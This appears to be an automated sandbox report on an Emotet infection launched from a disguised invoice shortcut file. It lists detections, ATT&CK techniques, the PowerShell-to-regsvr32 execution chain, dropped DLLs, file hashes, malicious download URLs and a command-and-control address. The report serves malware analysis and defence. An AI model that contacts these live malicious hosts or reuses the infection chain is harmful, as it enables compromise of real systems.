                    Source: svchost.exe, 0000000D.00000002.526889365.0000017433102000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.526730292.000001743302A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 6.2.regsvr32.exe.1de0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.regsvr32.exe.730000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.regsvr32.exe.730000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.regsvr32.exe.1de0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.302284085.0000000001DE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.528233629.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.302481665.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.526430630.0000000000730000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid Accounts1
                    Windows Management Instrumentation
                    1
                    DLL Side-Loading
                    1
                    DLL Side-Loading
                    1
                    Disable or Modify Tools
                    OS Credential Dumping1
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    Exfiltration Over Other Network Medium12
                    Ingress Tool Transfer
                    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default Accounts2
                    Native API
                    Boot or Logon Initialization Scripts111
                    Process Injection
                    11
                    Deobfuscate/Decode Files or Information
                    LSASS Memory2
                    File and Directory Discovery
                    Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
                    Encrypted Channel
                    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain Accounts21
                    Command and Scripting Interpreter
                    Logon Script (Windows)Logon Script (Windows)2
                    Obfuscated Files or Information
                    Security Account Manager25
                    System Information Discovery
                    SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                    Non-Standard Port
                    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local Accounts2
                    PowerShell
                    Logon Script (Mac)Logon Script (Mac)1
                    DLL Side-Loading
                    NTDS1
                    Query Registry
                    Distributed Component Object ModelInput CaptureScheduled Transfer2
                    Non-Application Layer Protocol
                    SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script31
                    Masquerading
                    LSA Secrets151
                    Security Software Discovery
                    SSHKeyloggingData Transfer Size Limits22
                    Application Layer Protocol
                    Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common31
                    Virtualization/Sandbox Evasion
                    Cached Domain Credentials31
                    Virtualization/Sandbox Evasion
                    VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items111
                    Process Injection
                    DCSync12
                    Process Discovery
                    Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                    Hidden Files and Directories
                    Proc Filesystem1
                    Application Window Discovery
                    Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                    Regsvr32
                    /etc/passwd and /etc/shadow1
                    Remote System Discovery
                    Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 632058 Sample: Rechnungskorrektur 2022.20.... Startdate: 23/05/2022 Architecture: WINDOWS Score: 100 51 Malicious sample detected (through community Yara rule) 2->51 53 Antivirus detection for URL or domain 2->53 55 Windows shortcut file (LNK) starts blacklisted processes 2->55 57 8 other signatures 2->57 8 cmd.exe 1 2->8         started        11 svchost.exe 2->11         started        13 svchost.exe 1 1 2->13         started        16 9 other processes 2->16 process3 dnsIp4 63 Windows shortcut file (LNK) starts blacklisted processes 8->63 65 Suspicious powershell command line found 8->65 18 powershell.exe 14 21 8->18         started        23 conhost.exe 1 8->23         started        67 Changes security center settings (notifications, updates, antivirus, firewall) 11->67 25 MpCmdRun.exe 1 11->25         started        49 127.0.0.1 unknown unknown 13->49 signatures5 process6 dnsIp7 43 mandom.co.id 103.89.5.69, 49763, 80 IDNIC-BIZNETGIO-AS-IDPTBiznetGioNusantaraID Indonesia 18->43 39 C:\Users\user\AppData\...\MevgMvopaw.BUS, PE32+ 18->39 dropped 59 Powershell drops PE file 18->59 27 regsvr32.exe 5 18->27         started        31 svchost.exe 4 18->31         started        33 conhost.exe 25->33         started        file8 signatures9 process10 file11 41 C:\Windows\...\JWwyPPSZDhCDc.dll (copy), PE32+ 27->41 dropped 69 Hides that the sample has been downloaded from the Internet (zone.identifier) 27->69 35 regsvr32.exe 27->35         started        signatures12 process13 dnsIp14 45 173.82.82.196, 49772, 8080 MULTA-ASN1US United States 35->45 47 192.168.2.1 unknown unknown 35->47 61 System process connects to network (likely due to code injection or exploit) 35->61 signatures15

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    Rechnungskorrektur 2022.20.05_1305.lnk39%ReversingLabsShortcut.Trojan.Emotet
                    Rechnungskorrektur 2022.20.05_1305.lnk100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\JydgVvbPD\MevgMvopaw.BUS100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\JydgVvbPD\MevgMvopaw.BUS59%ReversingLabsWin64.Trojan.Emotet
                    C:\Windows\System32\UjKMhzOwg\JWwyPPSZDhCDc.dll (copy)59%ReversingLabsWin64.Trojan.Emotet
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    https://173.82.82.196:8080/t100%Avira URL Cloudmalware
                    https://contoso.com/License0%URL Reputationsafe
                    http://mandom.co.id/assets/TpIIt7SmNBsWCECLoHrS/100%Avira URL Cloudmalware
                    http://mandom.co.id/0%Avira URL Cloudsafe
                    https://173.82.82.196:8080/tem100%Avira URL Cloudmalware
                    http://crl.microso0%URL Reputationsafe
                    http://pacemaker.cd/images/Xc/100%Avira URL Cloudphishing
                    https://contoso.com/0%URL Reputationsafe
                    http://mandom.co0%Avira URL Cloudsafe
                    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                    https://contoso.com/Icon0%URL Reputationsafe
                    https://173.82.82.196/100%URL Reputationmalware
                    http://crl.ver)0%Avira URL Cloudsafe
                    http://mandom.co.id0%Avira URL Cloudsafe
                    https://%s.xboxlive.com0%URL Reputationsafe
                    https://173.82.82.196:8080/100%URL Reputationmalware
                    http://masidiomas.com/D4WStats/GAhmgvhLgUn6/100%Avira URL Cloudmalware
                    https://dynamic.t0%URL Reputationsafe
                    http://mandom.co.idx0%Avira URL Cloudsafe
                    https://bpsjambi.id/about/VPe69A9Tk/100%Avira URL Cloudmalware
                    http://marmaris.com.br/wp-admin/2cfpSuAH/100%Avira URL Cloudmalware
                    https://%s.dnet.xboxlive.com0%URL Reputationsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    mandom.co.id
                    103.89.5.69
                    truefalse
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      http://mandom.co.id/assets/TpIIt7SmNBsWCECLoHrS/true
                      • Avira URL Cloud: malware
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://173.82.82.196:8080/tregsvr32.exe, 00000009.00000002.526688728.000000000080C000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      unknown
                      https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 0000000B.00000002.327253252.000001FF4B23C000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 0000000B.00000003.326446467.000001FF4B260000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 0000000B.00000002.327253252.000001FF4B23C000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://dev.ditu.live.com/REST/v1/Traffic/Incidents/svchost.exe, 0000000B.00000003.326469338.000001FF4B25A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327271835.000001FF4B25C000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 0000000B.00000003.326501558.000001FF4B246000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327266562.000001FF4B24D000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://contoso.com/Licensepowershell.exe, 00000002.00000002.301101086.00000166EFC41000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 0000000B.00000003.326446467.000001FF4B260000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 0000000B.00000002.327259328.000001FF4B242000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.326535383.000001FF4B240000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 0000000B.00000003.326446467.000001FF4B260000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 0000000B.00000003.326469338.000001FF4B25A000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 0000000B.00000003.304174925.000001FF4B231000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://mandom.co.id/powershell.exe, 00000002.00000002.298293260.00000166E07FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://173.82.82.196:8080/temregsvr32.exe, 00000009.00000002.526688728.000000000080C000.00000004.00000020.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 0000000B.00000002.327259328.000001FF4B242000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.326535383.000001FF4B240000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://crl.microsopowershell.exe, 00000002.00000002.302723143.00000166F7EB0000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://pacemaker.cd/images/Xc/powershell.exe, 00000002.00000002.298827087.00000166E08B6000.00000004.00000800.00020000.00000000.sdmptrue
                                            • Avira URL Cloud: phishing
                                            unknown
                                            https://contoso.com/powershell.exe, 00000002.00000002.301101086.00000166EFC41000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.301101086.00000166EFC41000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://mandom.copowershell.exe, 00000002.00000002.298293260.00000166E07FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.293436051.00000166DFBE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.bingmapsportal.comsvchost.exe, 0000000B.00000002.327213021.000001FF4B213000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 0000000B.00000002.327253252.000001FF4B23C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 0000000B.00000003.326446467.000001FF4B260000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.301101086.00000166EFC41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://yamada-shoshi.main.jp/yamada-shoshi/V61hH/powershell.exe, 00000002.00000002.298827087.00000166E08B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 0000000B.00000003.326530278.000001FF4B256000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.294144175.00000166DFDF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.294144175.00000166DFDF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://dev.ditu.live.com/REST/v1/Transit/Stops/svchost.exe, 0000000B.00000003.326297675.000001FF4B267000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327411940.000001FF4B26A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 0000000B.00000002.327253252.000001FF4B23C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://contoso.com/Iconpowershell.exe, 00000002.00000002.301101086.00000166EFC41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 0000000B.00000003.304174925.000001FF4B231000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://173.82.82.196/regsvr32.exe, 00000009.00000002.526839029.000000000084B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.526658997.0000000000803000.00000004.00000020.00020000.00000000.sdmptrue
                                                                    • URL Reputation: malware
                                                                    unknown
                                                                    http://crl.ver)svchost.exe, 00000010.00000002.528849751.000002E1BD862000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    low
                                                                    https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 0000000B.00000003.326535383.000001FF4B240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.326469338.000001FF4B25A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327271835.000001FF4B25C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://mandom.co.idpowershell.exe, 00000002.00000002.298089858.00000166E07D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.298208653.00000166E07F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 0000000B.00000002.327213021.000001FF4B213000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327253252.000001FF4B23C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://%s.xboxlive.comsvchost.exe, 00000008.00000002.526791270.0000020E43244000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        low
                                                                        https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000000B.00000003.326501558.000001FF4B246000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327266562.000001FF4B24D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 0000000B.00000003.326446467.000001FF4B260000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000000B.00000003.304174925.000001FF4B231000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 0000000B.00000003.326446467.000001FF4B260000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.294144175.00000166DFDF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://173.82.82.196:8080/regsvr32.exe, 00000009.00000002.526688728.000000000080C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.526839029.000000000084B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.526658997.0000000000803000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                  • URL Reputation: malware
                                                                                  unknown
                                                                                  https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 0000000B.00000002.327271835.000001FF4B25C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 0000000B.00000003.326469338.000001FF4B25A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327271835.000001FF4B25C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://masidiomas.com/D4WStats/GAhmgvhLgUn6/powershell.exe, 00000002.00000002.298827087.00000166E08B6000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                      • Avira URL Cloud: malware
                                                                                      unknown
                                                                                      https://dynamic.tsvchost.exe, 0000000B.00000002.327266562.000001FF4B24D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      http://mandom.co.idxpowershell.exe, 00000002.00000002.298089858.00000166E07D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://bpsjambi.id/about/VPe69A9Tk/powershell.exe, 00000002.00000002.298827087.00000166E08B6000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                      • Avira URL Cloud: malware
                                                                                      unknown
                                                                                      https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 0000000B.00000003.326446467.000001FF4B260000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 0000000B.00000002.327240023.000001FF4B23A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.304174925.000001FF4B231000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://marmaris.com.br/wp-admin/2cfpSuAH/powershell.exe, 00000002.00000002.298827087.00000166E08B6000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                          • Avira URL Cloud: malware
                                                                                          unknown
                                                                                          https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 0000000B.00000002.327271835.000001FF4B25C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://activity.windows.comsvchost.exe, 00000008.00000002.526791270.0000020E43244000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 0000000B.00000003.326446467.000001FF4B260000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://%s.dnet.xboxlive.comsvchost.exe, 00000008.00000002.526791270.0000020E43244000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                low
                                                                                                https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 0000000B.00000003.326469338.000001FF4B25A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.327271835.000001FF4B25C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 0000000B.00000003.326469338.000001FF4B25A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    • No. of IPs < 25%
                                                                                                    • 25% < No. of IPs < 50%
                                                                                                    • 50% < No. of IPs < 75%
                                                                                                    • 75% < No. of IPs
                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                    173.82.82.196
                                                                                                    unknownUnited States
                                                                                                    35916MULTA-ASN1UStrue
                                                                                                    103.89.5.69
                                                                                                    mandom.co.idIndonesia
                                                                                                    133800IDNIC-BIZNETGIO-AS-IDPTBiznetGioNusantaraIDfalse
                                                                                                    IP
                                                                                                    192.168.2.1
                                                                                                    127.0.0.1
                                                                                                    Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                    Analysis ID:632058
                                                                                                    Start date and time: 23/05/202208:56:292022-05-23 08:56:29 +02:00
                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                    Overall analysis duration:0h 7m 58s
                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                    Report type:light
                                                                                                    Sample file name:Rechnungskorrektur 2022.20.05_1305.lnk
                                                                                                    Cookbook file name:default.jbs
                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                    Number of analysed new started processes analysed:28
                                                                                                    Number of new started drivers analysed:0
                                                                                                    Number of existing processes analysed:0
                                                                                                    Number of existing drivers analysed:0
                                                                                                    Number of injected processes analysed:0
                                                                                                    Technologies:
                                                                                                    • HCA enabled
                                                                                                    • EGA enabled
                                                                                                    • HDC enabled
                                                                                                    • AMSI enabled
                                                                                                    Analysis Mode:default
                                                                                                    Analysis stop reason:Timeout
                                                                                                    Detection:MAL
                                                                                                    Classification:mal100.troj.evad.winLNK@23/11@1/4
                                                                                                    EGA Information:
                                                                                                    • Successful, ratio: 66.7%
                                                                                                    HDC Information:
                                                                                                    • Successful, ratio: 51.3% (good quality ratio 27.5%)
                                                                                                    • Quality average: 32.8%
                                                                                                    • Quality standard deviation: 37.5%
                                                                                                    HCA Information:
                                                                                                    • Successful, ratio: 96%
                                                                                                    • Number of executed functions: 0
                                                                                                    • Number of non-executed functions: 0
                                                                                                    Cookbook Comments:
                                                                                                    • Found application associated with file extension: .lnk
                                                                                                    • Adjust boot time
                                                                                                    • Enable AMSI
                                                                                                    • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, wuapihost.exe
                                                                                                    • TCP Packets have been reduced to 100
                                                                                                    • Excluded IPs from analysis (whitelisted): 23.211.4.86, 8.252.5.126, 8.248.119.254, 8.241.126.249, 8.238.85.126, 8.253.95.121, 20.223.24.244
                                                                                                    • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, wu-bg-shim.trafficmanager.net, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 1192 because it is empty
                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                    • VT rate limit hit for: Rechnungskorrektur 2022.20.05_1305.lnk
                                                                                                    TimeTypeDescription
                                                                                                    08:57:48API Interceptor43x Sleep call for process: powershell.exe modified
                                                                                                    08:58:12API Interceptor5x Sleep call for process: svchost.exe modified
                                                                                                    08:59:08API Interceptor1x Sleep call for process: MpCmdRun.exe modified
                                                                                                    No context
                                                                                                    No context
                                                                                                    No context
                                                                                                    No context
                                                                                                    No context
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x327a5cf0, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                    Category:dropped
                                                                                                    Size (bytes):786432
                                                                                                    Entropy (8bit):0.250754463173021
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:3/8+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:rSB2nSB2RSjlK/+mLesOj1J2
                                                                                                    MD5:A44D9BBD4BD90B4A0387BD7BCA3D6D16
                                                                                                    SHA1:F72DDCDAB2456F576B8ADF6A99158BC5DC8DEDF1
                                                                                                    SHA-256:762B59802659577C3E67358445AE285CFE2AE807EB6EAE18097F04D5411883C0
                                                                                                    SHA-512:1581C0C5F9A977E5D88C4580D8E5C18CA332CD558C7D364AD833AA55601C2D2353BC56D8498014C5439A591D7B985BA363550267D86B1E8BC34CD696E0C7FF51
                                                                                                    Malicious:false
                                                                                                    Preview:2z\.... ................e.f.3...w........................&..........w...:...z5.h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w.......................................................................................................................................................................................................................................T...:...z5....................:...z5.........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Windows\System32\regsvr32.exe
                                                                                                    File Type:Microsoft Cabinet archive data, 61480 bytes, 1 file
                                                                                                    Category:dropped
                                                                                                    Size (bytes):61480
                                                                                                    Entropy (8bit):7.9951219482618905
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:kmu7iDG/SCACih0/8uIGantJdjFpTE8lTeNjiXKGgUN:CeGf5gKsG4vdjFpjlYeX9gUN
                                                                                                    MD5:B9F21D8DB36E88831E5352BB82C438B3
                                                                                                    SHA1:4A3C330954F9F65A2F5FD7E55800E46CE228A3E2
                                                                                                    SHA-256:998E0209690A48ED33B79AF30FC13851E3E3416BED97E3679B6030C10CAB361E
                                                                                                    SHA-512:D4A2AC7C14227FBAF8B532398FB69053F0A0D913273F6917027C8CADBBA80113FDBEC20C2A7EB31B7BB57C99F9FDECCF8576BE5F39346D8B564FC72FB1699476
                                                                                                    Malicious:false
                                                                                                    Preview:MSCF....(.......,...................I........y.........Tbr .authroot.stl..$..4..CK..<Tk...c_.d....A.K.....Y.f....!.))$7*I.....e..eKT..k....n.3.......S..9.s.....3H.Mh......qV.=M6.=.4.F.....V:F..]......B`....Q...c"U.0.n....J.....4.....i7s..:.27....._...+).lE..he.4|.?,...h....7..PA..b.,. .....#1+..o...g.....2n1m...=.......Dp.;..f..ljX.Dx..r<'.1RI3B0<w.D.z..)D|..8<..c+..'XH..K,.Y..d.j.<.A.......l_lVb[w..rDp...'.....nL....!G.F....f.fX..r.. ?.....v(...L..<.\.Z..g;.>.0v...P ......|...A..(..x...T0.`g...c..7.U?...9.p..a..&..9......sV..l0..D..fhi..h.F....q...y.....Mq].4..Z.....={L....AS..9.....:.:.........+..P.N....EAQ.V. sr.....y.B.`.Efe..8../....$...y-.q.J.......nP...2.Q8...O........M.@\.>=X....V..z.4.=.@...ws.N.M3.S.c?.....C4]?..\.K.9......^...CU......O....X.`........._.gU...*..V.{V6..m..D.-|.Q.t.7.....9.~....[...I.<e...~$..>......s.I.S....~1..IV.2Ri:..]R!8...q...l.X.%.)@......2.gb,t...}..;...@.Z..<q..y..:...e3..cY.we.$....z..| .#.......I...
                                                                                                    Process:C:\Windows\System32\regsvr32.exe
                                                                                                    File Type:data
                                                                                                    Category:modified
                                                                                                    Size (bytes):330
                                                                                                    Entropy (8bit):3.11707576075895
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:kKA9doJN+SkQlPlEGYRMY9z+4KlDA3RUesJ21:gkPlE99SNxAhUesE1
                                                                                                    MD5:355520B9510C8962F8F2B63433ABA252
                                                                                                    SHA1:D30C81267E1F1CF7EC26A75F1E631ED291774C24
                                                                                                    SHA-256:91D4AFD09D5EFAB4560B42157784EAD5EB46F272785CF483215B6E3D64030904
